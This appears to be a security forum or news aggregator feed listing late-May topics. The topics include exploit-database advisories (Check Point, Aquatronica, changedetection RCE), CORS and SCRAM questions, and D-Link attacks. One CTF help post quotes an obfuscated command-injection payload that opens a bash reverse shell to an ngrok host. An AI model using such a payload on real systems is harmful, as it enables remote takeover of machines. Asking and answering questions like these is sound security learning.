31May
[webapps] Check Point Security Gateway – Information Disclosure (Unauthenticated)
Check Point Security Gateway – Information Disclosure (Unauthenticated)
31May
[webapps] Aquatronica Control System 5.1.6 – Information Disclosure
Aquatronica Control System 5.1.6 – Information Disclosure
31May
[webapps] changedetection < 0.45.20 – Remote Code Execution (RCE)
changedetection < 0.45.20 – Remote Code Execution (RCE)
27May
Does the CORS asteriks / wildcard include both encrypted and unencrypted origins?
Does the CORS asteriks / wildcard (*) include both encrypted (https) and unencrypted origins (http)? And is the null origin (i.e., when a local file is doing a xmlhttprequest, or within an iframe with sandbox attribute) regarded as http?
…
23May
Reverse Shell payload does not work
$(/bin/prin[t]f ‘ba\x73h -c \x27ba\x73h -i \x3e\x26 /d\x65v/t\x63p/2.t\x63p.eu.ngrok.io/xxxxx 0\x3e\x261\x27’)
-i: -c: line 1: unexpected EOF while looking for matching `”
I was trying to get a reverse shell in this manner for a CTF cha…
22May
D-Link Multiple Devices Attack
Multiple D-link device vulnerabilities are being actively targeted. Many of the Routers and NAS devices are end-of-life (EOL) D-Link devices that do not have any patches available.
20May
The Weird Windows Feature You’ve Never Heard Of
Article Link: https://www.youtube.com/watch?v=D5lQVdYYF4I
1 post – 1 participant
Read full topic
19May
Profiling and monitoring webserver execution over HTTP requests at the kernel level
I would like to know if there is a way to run an app to exhaustion in terms of all possible outcomes that it can provide.
What do I mean by that:
Let’s assume that someone has an (Apache) HTTP Server. What I am trying to do is to create pr…
19May
Execution profile for web server
I would like to know if there is a way to run an app to exhaustion in terms of all possible outcomes that it can provide.
What do I mean by that:
Let’s assume that someone has an (Apache) HTTP Server. What I am trying to do is to create pr…
18May
How to verify the salt in the SCRAM protocol?
I’ve recently read about the SCRAM authentication protocol. One of the stated design motivations is to support mutual authentication, but how does the client verify that the salt and cost parameters provided by the server are correct?
If t…
